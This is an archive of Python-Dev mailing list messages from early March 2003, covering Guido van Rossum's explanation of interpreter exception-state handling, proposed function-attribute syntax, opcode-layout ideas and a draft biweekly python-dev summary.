From guido@python.org  Sat Mar  1 01:52:58 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Feb 2003 20:52:58 -0500
Subject: [Python-Dev] Traceback problem
In-Reply-To: "Your message of Wed, 26 Feb 2003 03:40:11 +0100."
 <3E5C290B.9010802@tismer.com>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com>
 <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net>
 <3E5C290B.9010802@tismer.com>
Message-ID: <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>

(Picking up an old thread.)

[Guido]
> > Watch out though.  There are situations where an exception needs
> > to be stored but no frame is available (when executing purely in
> > C).  There is always a thread state.

[Christian]
> I've been sitting a while over this puzzle now.
> 
> tstate has two different kinds of exceptions:
> There are tstate->exc_XXX and tstate->curexc_XXX.
> 
> I have been searching through the whole source trunk
> to validate my thought:
> 
> All internal stuff is only concerned with handling
> tstate->curexc_XXX.

Correct.  This is the "hot" exception that is set by PyErr_SetString()
and friends, cleared by PyErr_Clear(), and so on.

> The tstate->exc_XXX is *only* used in ceval.c .

Once an exception is caught by an except clause, it is transferred
from tstate->curexc_XXX to tstate->exc_XXX, from which sys.exc_info()
can pick it up.

> References to tstate->exc_XXX are only in
> pystate.c (clearing stuff) and sysmodule.c (accessing stuff).
> The only place where tstate->exc_XXX is filled with life
> is ceval.c, which indicates that this is purely
> interpreter-related and has nothing to do with the internal exception
> state. It is eval_frame which checks for exceptions, normalizes
> them and turns them into interpreter-level exceptions,
> around line 2360 of ceval.c .

Correct.

> After stating that, I conclude that tstate.exc_XXX can only
> be in use if there is an existing interpreter with an existing
> frame. Nobody else makes use of this structure.
> So, whenever you have to save this, you can expect a valid
> frame waiting in f_back that will be able to take it.

Right.  Now let me explain the complicated dance with
frame->f_exc_XXX.  Long ago, when none of this existed, there were
just a few globals: one set corresponding to the "hot" exception, and
one set corresponding to sys.exc_type etc.  The problem was that in
code like this:

   try:
      "something that may fail"
   except "some exception":
      "do something else first"
      "print the exception from sys.exc_type etc."

if "do something else first" invoked something that raised and caught
an exception, sys.exc_type etc. were overwritten.  That was a frequent
cause of subtle bugs.  I fixed this by changing the semantics as
follows:

  - Within one frame, sys.exc_XXX will hold the last exception caught
    *in that frame*.

  - But initially, and as long as no exception is caught in a given
    frame, sys.exc_XXX will hold the last exception caught in the
    previous frame (or the frame before that, etc.).

The first bullet fixed the bug in the above example.  The second
bullet was for backwards compatibility: it was (and is) common to
have a function that is called when an exception is caught, and to
have that function access the caught exception via sys.exc_XXX.
(Example: traceback.print_exc()).
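
A minimal sketch of the two rules above, written for a current Python 3
interpreter (an assumption; the internals there differ from the 2003
ceval.c, but the behaviour visible through sys.exc_info() is the same).
The function names are made up for illustration.

```python
import sys


def noisy_helper():
    # Raises and catches its own exception; under the old global
    # sys.exc_type scheme this would have clobbered the caller's info.
    try:
        raise KeyError("inner")
    except KeyError:
        pass


def report():
    # Catches nothing itself, so it sees the exception its caller caught
    # (the backwards-compatibility rule, as with traceback.print_exc()).
    return sys.exc_info()[0]


def demo():
    try:
        raise ValueError("outer")
    except ValueError:
        noisy_helper()  # "do something else first"
        # Still the exception caught in *this* frame.
        return sys.exc_info()[0], report()


result = demo()  # (ValueError, ValueError)
```

Both elements are ValueError: the helper's KeyError never leaks into the
caller, and report() picks up the caller's exception.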

At the same time I fixed the problem that sys.exc_type and friends
weren't thread-safe, by introducing sys.exc_info() which gets it from
tstate; but that's really a separate improvement.

The reset_exc_info() function in ceval.c restores the tstate->exc_XXX
variables to what they were before the current frame was called.  The
set_exc_info() function saves them on the frame so that
reset_exc_info() can restore them.  The invariant is that
frame->f_exc_XXX is NULL iff the current frame never caught an
exception (where "catching" an exception applies only to successful
except clauses); and if the current frame ever caught an exception,
frame->f_exc_XXX is the exception that was stored in tstate->exc_XXX
at the start of the current frame.

Now I hope you'll understand why this was never documented
exactly. :-)

> (This all under the maybe false assumption that I'm not wrong).

No; I guess I was wrong in the quoted text at the top. :-)

> Still not proposing a change. But thanks for the time,
> I understood quite a lot more of the internals, now.

Great!  Hope this message has shed some additional light.

Kevin, I'll try to get to your patch next.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tjreedy@udel.edu  Sat Mar  1 03:25:25 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Fri, 28 Feb 2003 22:25:25 -0500
Subject: [Python-Dev] Re: Traceback problem
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com> <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net> <3E5C290B.9010802@tismer.com> <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <b3p95n$bd8$1@main.gmane.org>

"Guido van Rossum" <guido@python.org> wrote in message
news:200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net...
[explanation of traceback info storage]
> Great!  Hope this message has shed some additional light.

It would be a shame for this to be lost in the archives.  If there
were a directory of  ImplementationNotes somewhere (or an interpreter
wiki), this would belong there.  And responders to "where are the docs
on the implementation" could be told more than "read the source".

TJR


From guido@python.org  Sat Mar  1 03:40:55 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 28 Feb 2003 22:40:55 -0500
Subject: [Python-Dev] Re: Traceback problem
In-Reply-To: "Your message of Fri, 28 Feb 2003 22:25:25 EST."
 <b3p95n$bd8$1@main.gmane.org>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com>
 <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net>
 <3E5C290B.9010802@tismer.com>
 <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>
 <b3p95n$bd8$1@main.gmane.org>
Message-ID: <200303010340.h213etD23813@pcp02138704pcs.reston01.va.comcast.net>

> > Great!  Hope this message has shed some additional light.
> 
> It would be a shame for this to be lost in the archives.  If there
> were a directory of  ImplementationNotes somewhere (or an interpreter
> wiki), this would belong there.  And responders to "where are the docs
> on the implementation" could be told more than "read the source".

Good idea.  I hate separating implementation notes from the code by
more than absolutely necessary (Zope's cobweb of Wikis drives me nuts
:-), so I added the essence of that message to ceval.c as a big
comment block.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Sat Mar  1 04:06:20 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 28 Feb 2003 22:06:20 -0600
Subject: [Python-Dev] Re: Traceback problem
In-Reply-To: <b3p95n$bd8$1@main.gmane.org>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com>
 <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net>
 <3E5C290B.9010802@tismer.com>
 <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net>
 <b3p95n$bd8$1@main.gmane.org>
Message-ID: <15968.12732.65507.874387@montanaro.dyndns.org>

    Terry> [explanation of traceback info storage]
    >> Great!  Hope this message has shed some additional light.

    Terry> It would be a shame for this to be lost in the archives.  If
    Terry> there were a directory of ImplementationNotes somewhere (or an
    Terry> interpreter wiki), this would belong there.  

Feel free to add it to

    http://manatee.mojam.com/pyvmwiki

Skip


From niemeyer@conectiva.com  Sat Mar  1 08:00:43 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 1 Mar 2003 05:00:43 -0300
Subject: [Python-Dev] [663074] Codec registry
Message-ID: <20030301080043.GA28745@ibook.distro.conectiva>

Can someone please review the proposed solution to bug #663074?

If accepted, should it be backported to 2.2.3 as well?

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From mwh@python.net  Sat Mar  1 11:12:21 2003
From: mwh@python.net (Michael Hudson)
Date: Sat, 01 Mar 2003 11:12:21 +0000
Subject: [Python-Dev] syntax for funcion attributes
In-Reply-To: <006101c2df5b$5bbc72d0$a502200a@mnotlaptop> ("Mark
 Nottingham"'s message of "Fri, 28 Feb 2003 10:58:11 -0800")
References: <006101c2df5b$5bbc72d0$a502200a@mnotlaptop>
Message-ID: <2mznofwdbe.fsf@starship.python.net>

"Mark Nottingham" <mnot@mnot.net> writes:

> Hello,
>
> I'm not a python-dev regular, so sorry if this is a FAQ. What's the status
> of defining a syntax for function attributes (PEP 232)?

I don't think changes here are likely.

> I'm using __doc__ to carry metadata about methods right now, but
> would very much like to use function attributes. However, without a
> specialized syntax, I'm stuck doing things like
>
> VeryLongMethodName.MetadataName = "foo"
>
> which is fine if it's a one-off, but I'd like others to use the code, and
> this isn't exactly a friendly mechanism.

If PEP <the one I haven't written yet> gets accepted, you'll be able
to do

def with_metadata(func):
    func.metadata = "yes"
    return func  # hand the function back so f is not rebound to None

def f(blah) [with_metadata]:
    ....

or even 

def with_metadata(data):
    def inner(func):
        func.metadata = data
        return func  # hand the function back so f is not rebound to None
    return inner

def f(blah) [with_metadata("yes")]:
    ....

Would that suit you?
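
Until such a syntax exists, the same effect is available with an
explicit call after the definition.  A minimal sketch, assuming the
bracket form would amount to rebinding the name to the wrapper's result;
the function f and its body are placeholders.

```python
def with_metadata(data):
    """Return a wrapper that tags a function with `data` and hands it back."""
    def inner(func):
        func.metadata = data
        return func
    return inner


def f(blah):
    return blah


# Spelled out by hand: apply the wrapper and rebind the name.
f = with_metadata("yes")(f)
```

After this, f.metadata is "yes" and f still behaves as before.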

Cheers,
M.

-- 
  > Why are we talking about bricks and concrete in a lisp newsgroup?
  After long experiment it was found preferable to talking about why
  Lisp is slower than C++...
                        -- Duane Rettig & Tim Bradshaw, comp.lang.lisp


From newsgroups1@bitfurnace.com  Sat Mar  1 22:54:49 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Sat, 1 Mar 2003 17:54:49 -0500
Subject: [Python-Dev] Re: new bytecode results
References: <001301c2def2$09d374a0$6401a8c0@damien> <3E5F2260.3080808@lemburg.com> <b3o4ti$nsl$1@main.gmane.org>
Message-ID: <b3re2i$rad$1@main.gmane.org>

I just realised that scoring layouts based on adjacency is the traveling
salesman problem, where the distance between two opcodes is
freq[op1][op2]+freq[op2][op1], and the goal is to maximise the total
distance traveled.

Solving for 150 or so opcodes is well within reach.
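
For a handful of opcodes the idea can be checked by brute force.  This
is only a sketch: it treats a layout as an open path rather than a
closed tour (an assumption), the frequency matrix is invented, and
trying every permutation is hopeless at 150 opcodes, where a real TSP
heuristic would be needed.

```python
from itertools import permutations


def path_weight(order, freq):
    """Sum of freq[a][b] + freq[b][a] over neighbouring opcodes in `order`."""
    return sum(freq[a][b] + freq[b][a] for a, b in zip(order, order[1:]))


def best_layout(freq):
    """Exhaustively pick the ordering with the largest total weight."""
    n = len(freq)
    return max(permutations(range(n)), key=lambda order: path_weight(order, freq))


# Invented pair frequencies for three opcodes: freq[i][j] counts i followed by j.
freq = [
    [0, 5, 1],
    [2, 0, 4],
    [3, 1, 0],
]
best = best_layout(freq)
best_weight = path_weight(best, freq)
```

With this matrix the heaviest path puts opcode 1 in the middle, for a
total weight of 12.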


"Damien Morton" <newsgroups1@bitfurnace.com> wrote in message
news:b3o4ti$nsl$1@main.gmane.org...
> > >>c) ordering cases in the switch statements by usage frequency
> > >>    (using average opcode usage frequencies obtained by
> > >>    instrumenting the interpreter)
> > >
> > > I might try a little simulated annealing to generate layouts with high
> > > frequency opcodes near the front and co-occurring opcodes near each
> > > other.
> >
> > I did that by hand, sort of :-) The problem is that the
> > scoring phases takes rather long, so you better start with
> > a good guess.
>
> I'm wondering what a good scoring scheme would look like.
>
> I tried a scoring scheme in which layouts were scored thusly:
>
> for (i = 0; i < MAXOP; i++)
>     for (j = 0; j < MAXOP; j++)
>         score += pairfreq[layout[i]][layout[j]] * (i < j ? j-i : i-j);
>
> This works fine, but I'm thinking that a simpler scoring scheme which looks
> only at the frequencies of adjacent ops might be sufficient, and would
> certainly be faster.
>
> for (i = 1; i < MAXOP; i++)
>     score += pairfreq[layout[i-1]][layout[i]];
>
> The idea is that while caches favour locality of reference, because a cache
> line is finite in size and relatively small (16 or 64 bytes), there aren't
> any long-range effects. In other words, caches favour adjacency of reference
> rather than locality of reference.
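
The two scoring schemes quoted above translate directly into Python.  A
small sketch for comparing them; the function names and the 3x3
pairfreq matrix are made up for illustration, and nothing here says
whether a high or a low score is the better layout.

```python
def distance_score(layout, pairfreq):
    """Every pair of slots, weighted by how far apart the slots are."""
    n = len(layout)
    return sum(
        pairfreq[layout[i]][layout[j]] * abs(i - j)
        for i in range(n)
        for j in range(n)
    )


def adjacent_score(layout, pairfreq):
    """Only neighbouring slots: O(n) instead of O(n**2)."""
    return sum(
        pairfreq[layout[i - 1]][layout[i]] for i in range(1, len(layout))
    )


# Invented data: pairfreq[a][b] counts opcode a immediately followed by b.
pairfreq = [
    [0, 5, 1],
    [2, 0, 4],
    [3, 1, 0],
]
layout = [0, 1, 2]
full = distance_score(layout, pairfreq)
cheap = adjacent_score(layout, pairfreq)
```

For this layout the full score is 20 and the adjacent-only score is 9.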


From drifty@alum.berkeley.edu  Sun Mar  2 02:25:28 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Sat, 1 Mar 2003 18:25:28 -0800 (PST)
Subject: [Python-Dev] python-dev from 2003-02-16 through 2003-02-28
Message-ID: <Pine.SOL.4.53.0303011823560.502@death.OCF.Berkeley.EDU>

Since this is falling on the weekends, you guys have until Monday night to
tell me how I fouled up.

+++++++++++++++++++++++++++++++++++++++++++++++++++++
python-dev Summary for 2003-02-16 through 2003-02-28
+++++++++++++++++++++++++++++++++++++++++++++++++++++

.. _comp.lang.python:
.. _rest:
.. _last summary:

======================
Summary Announcements
======================

Nothing specific about the Summary to mention.  I am starting to lean more
and more towards starting summaries out in Quickies_ and then making them
a full-fledged summary when they end up requiring more than a short
paragraph of explanation.  Helps me keep my sanity since I plan on
sticking with having some summarization for every thread on python-dev.

But this summary is on the lean side because traffic was lower than
normal.  I am sure this is in reaction to what happened last month with
the massive amount of emails and various negativity that sprung up around
the list.  Made my life easier.  =)

PyCon_ is moving forward!  Early-bird registration is over, but regular
registration for $200 is still available.  It has already shaped up to be
a fun conference.  If you come you can hear me make a fool of myself
trying to teach the conference reST_.  =)

T-shirts are also available so even if you don't go to the conference you
can buy a shirt at http://www.cafeshops.com/pycon and fool people into
thinking you went.  =)

As for the `pre-PyCon sprint`_, that is also shaping up.  There is already
a sprint for Zope_, Twisted_, and Webware_.  And now there is a sprint in
the works for working on the Python core!  If you are interested just
<XXX: waiting for Guido to tell me how he wants to be contacted>.

.. _PyCon: http://www.python.org/pycon/
.. _pre-PyCon sprint: http://www.python.org/cgi-bin/moinmoin/SprintPlan
.. _Zope: http://www.zope.org/
.. _Twisted: http://twistedmatrix.com/
.. _Webware: http://webware.sourceforge.net/


===========================
`RELEASED: Python 2.3a2`__
===========================
__ http://mail.python.org/pipermail/python-dev/2003-February/033537.html

Guido released `Python 2.3a2`_ on Feb. 19.  Please download it, run the
regression tests, and then test some of your own code.  The more bugs we
can squash before we hit 2.3b1 the better.

.. _Python 2.3a2: http://www.python.org/2.3/


===================================
`new format codes for getargs.c`__
===================================
__ http://mail.python.org/pipermail/python-dev/2003-February/033579.html

Thomas Heller implemented a new 'k' format code for `getargs.c`_ that
"accepts integers or longs, does no range checking, and returns the lower
bits in an unsigned long".  After Tim Peters said that tests should be
added to `_testcapimodule.c`_ the conversation was moved over to
http://www.python.org/sf/595026 .
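
What "returns the lower bits in an unsigned long" means can be mimicked
from Python.  This is only an illustration of the arithmetic, not the
getargs.c code; the helper name is made up, and ctypes is used just to
ask the platform how wide an unsigned long is.

```python
import ctypes


def low_bits_as_ulong(n):
    """Keep only the bits of n that fit in a C unsigned long (no range check)."""
    bits = 8 * ctypes.sizeof(ctypes.c_ulong)
    return n & ((1 << bits) - 1)


wrapped = low_bits_as_ulong(-1)  # all bits set, i.e. the platform's ULONG_MAX
```

A negative or oversized Python integer is silently reduced rather than
rejected, which is the point of skipping the range check.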

.. _getargs.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/getargs.c
.. __testcapimodule.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/_testcapimodule.c


=====================================
`assymetry in descriptor behavior`__
=====================================
__ http://mail.python.org/pipermail/python-dev/2003-February/033583.html

This summary is going to assume you understand descriptors.  If you don't,
read `What's New in 2.2`_ for a nice, simple overview or `PEP 252`_ for
the technical explanation (the initial email for this thread has simple
code showing how descriptors are used).  If you have ever been interested
in how property(), classmethod(), and staticmethod() work this will tell you.

David Abrahams wondered why it was possible to invoke a descriptor's
__get__() from either the class it is defined in or an instance of that
class while __set__() for the same descriptor cannot be called from the
class directly without having defined the descriptor a second time in the
metaclass; David thought this was a little difficult.  He also asked about
the arguments to the descriptor API methods.

Guido responded by saying that it wasn't difficult considering you could
do it and that Python was pulling something off with a single notation (by
using '.' for class and instance accesses) that C++ uses two notations for
('.' and '::').  As for the arguments to the various methods, they are as
follows:

__get__(self, obj, type)
    'self' gets bound to the descriptor instance.  When called for a
class, obj = None while for an instance it is bound to the instance
containing the descriptor.  'type' is set to the class that has the
descriptor regardless of the context in which the descriptor is called.  The
duality is so that descriptors can be happy being called either just on an
instance or just a class (such as classmethod()).

__set__(self, obj, value)
    'self' is the descriptor, obj is the instance, and 'value' is what
the assignment is being passed.  As mentioned above, this only works
with classes if you create the descriptor *twice*; once in the class and
once in the class's metaclass.

__delete__(self, obj)
    Guess what gets bound to these parameters?  =)  A historical note:
Guido said "In an early alpha release it was actually __del__, but that
didn't work very well. :-)" for obvious reasons.
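
The asymmetry is easy to see with a descriptor that records how it is
called.  A small sketch; the class names Logged and C are made up for
illustration.

```python
class Logged:
    """Data descriptor that records every call made to it."""

    def __init__(self):
        self.calls = []

    def __get__(self, obj, type=None):
        # obj is None when looked up on the class, the instance otherwise.
        self.calls.append(("get", obj is None, type.__name__))
        return 42

    def __set__(self, obj, value):
        self.calls.append(("set", value))

    def __delete__(self, obj):
        self.calls.append(("delete",))


class C:
    x = Logged()


d = C.__dict__["x"]  # fetch the descriptor itself, bypassing __get__
c = C()
C.x        # __get__(d, None, C)
c.x        # __get__(d, c, C)
c.x = 1    # __set__(d, c, 1)
del c.x    # __delete__(d, c)
C.x = 5    # no __set__ call: this simply replaces the descriptor on the class
```

After the last line C.__dict__["x"] is the plain integer 5, and d.calls
holds only the four calls made before it.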

David also submitted a doc patch for this so we are now one step closer to
having new-style classes documented.  Still, there is work to be done and
if you care to help please do so.

.. _What's New in 2.2:
http://www.python.org/doc/2.2.1/whatsnew/sect-rellinks.html#SECTION000320000000000000000
.. _PEP 252: http://www.python.org/peps/pep-0252.html


======================
`Bytecode analysis`__
======================
__ http://mail.python.org/pipermail/python-dev/2003-February/033663.html

Splinter threads:
    - `Bytecode idea
<http://mail.python.org/pipermail/python-dev/2003-February/033693.html>`__
    - `Code Generation Idea
<http://mail.python.org/pipermail/python-dev/2003-February/033692.html>`__
    - `Dynamic bytecode analysis
<http://mail.python.org/pipermail/python-dev/2003-February/033752.html>`__
    - `new bytecode results
<http://mail.python.org/pipermail/python-dev/2003-February/033775.html>`__

Damien Morton posted some opcode statistics and tried to get better
performance out of `ceval.c`_ by coming up with a way to do a LOAD_FAST_n
call (LOAD_FAST pushes a variable on to the stack) and to cut back on the
size of .pyc files.  Nothing panned out very much, though (all the
benchmarking was done using Pystone_).

Guido said that Christian Tismer's idea of changing some of the
rarely-used opcodes to function calls and moving them out of the 'switch'
statement might get some performance.

Christian also thought that some work could be done to speed up calls that
involve a ``goto fast_next_opcode`` call.

Changing ceval.c to using a jump table instead of a switch also did not
pan out.

Jeremy Hylton spoke to let people know that sometimes having an opcode
call out to a function is not necessarily slower than having the code in
the switch statement.  He said it depended on how much work the opcode had
to do and "lots of other hard-to-predict effects" in terms of memory and
generated machine code.

Jeremy also reminded people that there is a patch out there to use the
Pentium's cycle counter to find out how many cycles are spent on each pass
through the mainloop.

Guido also said that "If you really want fame and fortune, try designing a
more representative benchmark".  AM Kuchling requested to be notified when
someone decided to take on this project.

Skip Montanaro pointed out that he has "an XML-RPC server available to
which applications can connect and upload their dynamic opcode
frequencies" at http://manatee.mojam.com:7304 .  Compile with
"DYNAMIC_EXECUTION_PROFILE and DXPAIRS defined" and fetch the info from the
sys_ module (it's undocumented, but it looks like you can get execution
info from sys.getdxp()).  If you are interested in how to use Skip's
server, see
http://mail.python.org/pipermail/python-dev/2003-February/033767.html .
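
Without a specially compiled interpreter, a rough static stand-in for
pair frequencies can be had from the dis module.  This is a sketch only:
it counts opcode pairs as they appear in the compiled code, not as they
execute, so it is no substitute for the dynamic profile described above.
It assumes a Python recent enough to have dis.get_instructions(); the
helper and sample function are made up.

```python
import dis
from collections import Counter


def static_opcode_pairs(func):
    """Count adjacent opcode-name pairs in func's bytecode."""
    names = [ins.opname for ins in dis.get_instructions(func)]
    return Counter(zip(names, names[1:]))


def sample(x):
    return x + 1


pairs = static_opcode_pairs(sample)
```

The exact opcode names in the result vary from one Python version to
the next.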

Damien Morton made his modified source code available at
http://www.bitfurnace.com/python/modified-source.zip and asked people to give
it a try and report back to him their results.

Dan Sugalski suggested putting opcodes that tend to execute in pairs
closer together so that they would have a better chance of being in the
cache.  It seemed that doing any mass opcode adding made things slower
since the switch got larger and thus made cache hits harder to come by.
Various ideas of how to rearrange things so that the switch was not as
large were suggested and are most likely still being tested.

.. _ceval.c:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/ceval.c
.. _Pystone:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Lib/test/pystone.py
.. _sys:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Python/sysmodule.c


=========
Quickies
=========

`CALL_ATTR, A Method Proposal
<http://mail.python.org/pipermail/python-dev/2003-February/033410.html>`__
    Finn Bock added one last comment to this thread from the `last
summary`_ about how the proposed implementation of a CALL_ATTR bytecode
was how Jython_ handled attribute calls.

`[Python-checkins] python/dist/src/Misc NEWS,1.660,1.661
<http://mail.python.org/pipermail/python-dev/2003-February/033466.html>`__:
`Package Install Manager for Python
<http://mail.python.org/pipermail/python-dev/2003-February/033467.html>`__
   We learn some people take offense to the word pimp (to the point of
considering them rapists), while others think it is fine ("a pretty
respectable profession [in Amsterdam].  Definitely higher standing than a
cab driver, somewhat on par with a coffeeshop owner").

`incorrect regression tests
<http://mail.python.org/pipermail/python-dev/2003-February/033469.html>`__
    Neal Norwitz discovered some regression tests that weren't being
executed.  We also learn that it is best for regression test modules to
define a test_main() function that executes all the tests rather than having the
tests run as a side-effect of importation (prevents the import lock from
being held).
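
    A minimal sketch of that layout, using plain unittest (the helper
functions in Python's own test package are left out, and the test case
is a placeholder):

```python
import unittest


class ArithmeticTest(unittest.TestCase):
    def test_add(self):
        self.assertEqual(1 + 1, 2)


def test_main():
    # Nothing runs at import time; the test driver calls this explicitly.
    suite = unittest.defaultTestLoader.loadTestsFromTestCase(ArithmeticTest)
    return unittest.TextTestRunner(verbosity=0).run(suite)


if __name__ == "__main__":
    test_main()
```

    Importing the module only defines the class and the function; the
tests run when something calls test_main().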

`non-binary operators
<http://mail.python.org/pipermail/python-dev/2003-February/033470.html>`__
    Hold-over from the `last summary`_ when discussing whether the ternary
operator could be just chained binary operators.

`Import lock knowledge required!
<http://mail.python.org/pipermail/python-dev/2003-February/033436.html>`__
    Another hold-over from the `last summary`_; Eric Jones says he
wouldn't mind more fine-grained import locking.

`various unix platform build/test issues
<http://mail.python.org/pipermail/python-dev/2003-February/033482.html>`__
    Neal Norwitz brought to the attention of python-dev some issues that
were preventing Python from compiling on some platforms.

`308: the debate is petering out
<http://mail.python.org/pipermail/python-dev/2003-February/033484.html>`__
    Samuele Pedroni posted some new stats on the `PEP 308`_ debate going
on at `comp.lang.python`_.

`[rfc] map enhancement
<http://mail.python.org/pipermail/python-dev/2003-February/033486.html>`__
    Ludovic Aubry proposed a change to map(), but his use-case was
eliminated quickly when it was pointed out he could just rewrite his map()
or use list comprehensions.

`Python 2.3a2 release today?
<http://mail.python.org/pipermail/python-dev/2003-February/033489.html>`__
    Guido asked if anyone objected to releasing Python 2.3a2 on Feb. 18.
Jack Jansen asked if Guido could wait a day and he said yes.

`test_timeout fails on Win98SE
<http://mail.python.org/pipermail/python-dev/2003-February/033515.html>`__
    The title of the thread states what the issue was and it got resolved.

`privacy in log files?
<http://mail.python.org/pipermail/python-dev/2003-February/033530.html>`__
    Guido discovered a comment about not using `PyErr_WarnExplicit()`_
because there was a worry of having code put into a log file.  Discussion
seemed to end on the idea that it wasn't so much security but throwing a
text editor for a loop because of possible non-ASCII getting put into a
log file.

`What happened to fixed point?
<http://mail.python.org/pipermail/python-dev/2003-February/033539.html>`__
    David LeBlanc asked about the status of FixedPoint_ getting into the
stdlib.  Raymond Hettinger said he would be getting to it soon.

`test_posix, test_random failing
<http://mail.python.org/pipermail/python-dev/2003-February/033541.html>`__
    I bet you can figure out what this thread is about.  SF tracker items
have now been created.

`pickling of large arrays
<http://mail.python.org/pipermail/python-dev/2003-February/033543.html>`__
    Ralf Grosse-Kunstleve asked if there was a way to minimize the amount of
buffering needed to pickle an array object.  It was pointed out that
writing a __reduce__() method that used an iterator would prevent the need
to do any major buffering.  The idea of having a custom append() method
for objects to return was also suggested, but didn't get resolved.

`Cygwin build failing
<http://mail.python.org/pipermail/python-dev/2003-February/033555.html>`__
    A problem with building under Cygwin was fixed by rebasing the system.

`2.3a2 problem: iconv module raising RuntimeError
<http://mail.python.org/pipermail/python-dev/2003-February/033570.html>`__
    `_iconv_codec.c`_ was raising RuntimeError when it was more proper to
raise ImportError.  It's been fixed.

`SCO Open Server 5.0.x thread support
<http://mail.python.org/pipermail/python-dev/2003-February/033575.html>`__
    Someone asked for help compiling on SCO with thread support.  He was
redirected to `comp.lang.python`_ to get help.

`call for Windows developers
<http://mail.python.org/pipermail/python-dev/2003-February/033582.html>`__
    Thomas Heller asked for help from some Windows experts with the goal
of getting ctypes_ so that one can write ActiveX controls in Python.

`tuning up...
<http://mail.python.org/pipermail/python-dev/2003-February/033585.html>`__
    Andrew MacIntyre sent some performance numbers for OS/2 EMX; about 10%
performance improvement from Python 2.2 with -O compared to stock Python
2.3 (-O in 2.3 does not do much since the SET_LINENO opcode was removed
entirely from Python).

`Weekly Python Bug/Patch Summary
<http://mail.python.org/pipermail/python-dev/2003-February/033586.html>`__
    Skip Montanaro's weekly reminder that Python is not perfect yet.  =)

`Needed: regexp maintainer
<http://mail.python.org/pipermail/python-dev/2003-February/033590.html>`__
    Guido asked for someone to step forward to take over for the re_
module.

`_iconv_codec
<http://mail.python.org/pipermail/python-dev/2003-February/033602.html>`__
    Guido asking what that `_iconv_codec.c`_ module was for (answer: it's
a wrapper for the iconv(3) POSIX module).

`python/dist/src configure,1.279.6.17...
<http://mail.python.org/pipermail/python-dev/2003-February/033596.html>`__
    Neil Schemenauer asked what the whitespace rules were for
pre-processor directives (e.g., #include, #define, etc.).  Tim Peters (the
resident C standards know-it-all) said that "Spaces and horizontal tabs
are fine before '#', and between '#' and the directive name".

`rename bsddbmodule.c to bsddb185.c
<http://mail.python.org/pipermail/python-dev/2003-February/033645.html>`__
    `bsddbmodule.c`_ is now going to compile to the module bsddb185.

`Scheduled downtime for mail.python.org
<http://mail.python.org/pipermail/python-dev/2003-February/033651.html>`__
    mail.python.org was scheduled to go down on 2003-02-26 at 10:00 EST.

`Traceback problem
<http://mail.python.org/pipermail/python-dev/2003-February/033607.html>`__
    Christian Tismer wanted a way to clear the traceback information
stored by `sys.exc_info()`_ on demand, since it is kept
around as long as the frame is alive.  Kevin Jacobs wrote a patch to
implement this feature and named it sys.exc_clear().  And a word of
warning to anyone who stores the info returned by sys.exc_info(); it
creates a cycle with the frame and thus can cause a huge chunk of memory
to be held so make sure to delete the info when you are done with it.
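
    One way to follow that advice is to drop the traceback reference in
a finally clause.  A minimal sketch; the function name and the values it
returns are just for illustration.

```python
import sys


def handle():
    try:
        raise ValueError("boom")
    except ValueError:
        exc_type, exc_value, tb = sys.exc_info()
        try:
            # Use the traceback while it is needed...
            return exc_type.__name__, tb.tb_lineno
        finally:
            # ...then drop the local reference so this frame no longer
            # points at a traceback that points back at the frame.
            del tb


name, lineno = handle()
```

    The del runs even though the function returns from inside the try
block.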

`module extension search order - can it be changed?
<http://mail.python.org/pipermail/python-dev/2003-February/033626.html>`__
    Skip Montanaro realized that most failed stat() calls occur because
the extension search order goes C extension and then Python module; most
modules are written in Python and thus the stat() call for a C extension
of a module name tends to fail.  Guido said it is this way so that if the
build of a C extension fails a same-named Python module can be installed
instead.  This also led to Skip possibly coming up with a build option of
creating a zip archive of the stdlib at install time to minimize failed
stat() calls.

`Writing a mutable object problem with __setattr__
<http://mail.python.org/pipermail/python-dev/2003-February/033627.html>`__
    Aleksandor Totic asked about classes and an object-persistence setup
he was designing.  You can learn about __setattr__() and how to find out
whether an instance is new-style or classic based on whether it has a
__class__ attribute (new-style has this).

`Re: some preliminary timings
<http://mail.python.org/pipermail/python-dev/2003-February/033634.html>`__
    Skip Montanaro discovering that importing email_ takes a while.

`GIL Pep commentary
<http://mail.python.org/pipermail/python-dev/2003-February/033657.html>`__
    David Abrahams basically saying he likes `PEP 311`_.

`test_re failing again on Mac OS X
<http://mail.python.org/pipermail/python-dev/2003-February/033668.html>`__
    Someone thought `test_re`_ was failing again on OS X when it turns out
it was an isolated incident.

`Slowdown in Python CVS
<http://mail.python.org/pipermail/python-dev/2003-February/033756.html>`__
    Someone thought that Python had slowed down for some reason; turned
out to be isolated.  If you ever need to check out a CVS copy from a past
date, execute ``cvs update -D '24 Feb 2003'`` (with the proper date, of
course).

